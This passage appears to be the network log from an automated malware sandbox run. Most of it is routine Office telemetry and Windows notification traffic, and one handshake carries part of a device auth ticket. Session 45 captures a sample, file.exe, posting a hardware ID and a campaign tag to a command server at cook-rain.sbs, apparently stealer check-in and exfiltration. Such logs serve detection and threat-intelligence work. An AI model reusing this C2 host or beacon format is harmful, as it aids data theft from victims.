                                                                                                                                                                        2024-11-21 09:37:31 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        38192.168.2.64974813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:31 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:31 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                        ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                        x-ms-request-id: c6b0c23f-801e-0048-738c-3af3fb000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093731Z-1777c6cb754xjpthhC1TEBexs80000000arg0000000090bm
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:31 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        39192.168.2.64974713.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:31 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:31 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                        ETag: "0x8DC582B988EBD12"
                                                                                                                                                                        x-ms-request-id: e86b2c91-101e-008e-05a0-3bcf88000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093731Z-r1d97b99577tssmjhC1TEB8kan0000000a50000000001z9h
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:31 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        40192.168.2.64975113.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:33 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:33 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                        ETag: "0x8DC582BB8972972"
                                                                                                                                                                        x-ms-request-id: 65766a7e-a01e-0002-4f8c-3a5074000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093733Z-r1d97b99577brct2hC1TEBambg00000003zg0000000004bm
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:33 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        41192.168.2.64975240.113.110.67443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:33 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 33 53 6c 51 6e 66 44 57 6c 30 79 39 73 64 6d 56 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 36 36 35 37 64 66 35 63 36 61 39 66 38 63 66 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: CNT 1 CON 305MS-CV: 3SlQnfDWl0y9sdmV.1Context: d6657df5c6a9f8cf
                                                                                                                                                                        2024-11-21 09:37:33 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                        2024-11-21 09:37:33 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 33 53 6c 51 6e 66 44 57 6c 30 79 39 73 64 6d 56 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 36 36 35 37 64 66 35 63 36 61 39 66 38 63 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 37 48 38 66 37 55 30 55 33 58 50 6e 6c 46 42 54 37 41 34 62 47 36 44 70 6a 4e 57 77 42 59 2f 59 33 57 67 4b 61 6a 39 54 41 52 38 70 32 64 34 4b 33 68 50 6c 6e 45 70 6a 33 68 41 53 42 46 67 56 47 34 5a 33 54 6d 4a 63 74 76 39 54 7a 71 47 61 59 52 38 31 65 38 42 4a 48 76 6b 63 4f 6b 72 56 39 65 39 4c 63 4d 6b 52 76 33 79 34
                                                                                                                                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 3SlQnfDWl0y9sdmV.2Context: d6657df5c6a9f8cf<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZ7H8f7U0U3XPnlFBT7A4bG6DpjNWwBY/Y3WgKaj9TAR8p2d4K3hPlnEpj3hASBFgVG4Z3TmJctv9TzqGaYR81e8BJHvkcOkrV9e9LcMkRv3y4
                                                                                                                                                                        2024-11-21 09:37:33 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 33 53 6c 51 6e 66 44 57 6c 30 79 39 73 64 6d 56 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 36 36 35 37 64 66 35 63 36 61 39 66 38 63 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: 3SlQnfDWl0y9sdmV.3Context: d6657df5c6a9f8cf<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                        2024-11-21 09:37:33 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                        Data Ascii: 202 1 CON 58
                                                                                                                                                                        2024-11-21 09:37:33 UTC58INData Raw: 4d 53 2d 43 56 3a 20 71 4a 77 47 72 56 4f 6f 70 30 4f 75 70 31 51 67 51 51 49 67 56 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                        Data Ascii: MS-CV: qJwGrVOop0Oup1QgQQIgVA.0Payload parsing failed.


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        42192.168.2.64975313.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:33 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:33 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 420
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                        ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                        x-ms-request-id: 65766a9d-a01e-0002-6d8c-3a5074000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093733Z-178bfbc474bnwsh4hC1NYC2ubs00000001cg000000005dt1
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:33 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        43192.168.2.64975413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:33 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:33 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                        ETag: "0x8DC582B9D43097E"
                                                                                                                                                                        x-ms-request-id: 76e93f39-101e-0034-5559-3b96ff000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093733Z-178bfbc474btrnf9hC1NYCb80g00000001c000000000b60z
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:33 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        44192.168.2.64975513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:33 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:33 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                        ETag: "0x8DC582BA909FA21"
                                                                                                                                                                        x-ms-request-id: bf14eb60-501e-007b-507b-3b5ba2000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093733Z-1777c6cb754dqb2khC1TEBmk1s0000000avg000000009gp4
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:33 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        45192.168.2.649757188.114.97.34434540C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:34 UTC269OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=6Z87O5Q6J
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 1166
                                                                                                                                                                        Host: cook-rain.sbs
                                                                                                                                                                        2024-11-21 09:37:34 UTC1166OUTData Raw: 2d 2d 36 5a 38 37 4f 35 51 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 30 35 45 31 41 45 31 45 46 38 38 32 44 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 36 5a 38 37 4f 35 51 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 5a 38 37 4f 35 51 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 36 5a 38 37 4f 35 51 36 4a 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                        Data Ascii: --6Z87O5Q6JContent-Disposition: form-data; name="hwid"91B05E1AE1EF882D63CFCF7E6C45F838--6Z87O5Q6JContent-Disposition: form-data; name="pid"1--6Z87O5Q6JContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--6Z87O5Q6JConten
                                                                                                                                                                        2024-11-21 09:37:34 UTC983INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:34 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=mmcsv37bhom2ld26aetq4n8bhq; expires=Mon, 17-Mar-2025 03:24:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eV6qZ0TpAd0QrfGZVlVQ%2FJmoIC9yCzRKSOLZXzF26fJ8zjytgTQJfo2poYRNSEPctHYH3HKS2xYkIAs8SEmfJWIUiUKeIGB%2FOIu7sEX9HIKj49NgrvReP%2F4fF45V%2FHsQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e5fb3ad4e3b41b2-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1627&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2071&delivery_rate=1646926&cwnd=217&unsent_bytes=0&cid=21b4dcb293714e60&ts=713&x=0"
                                                                                                                                                                        2024-11-21 09:37:34 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                        Data Ascii: eok 8.46.123.75
                                                                                                                                                                        2024-11-21 09:37:34 UTC5INData Raw: 30 0d 0a 0d 0a
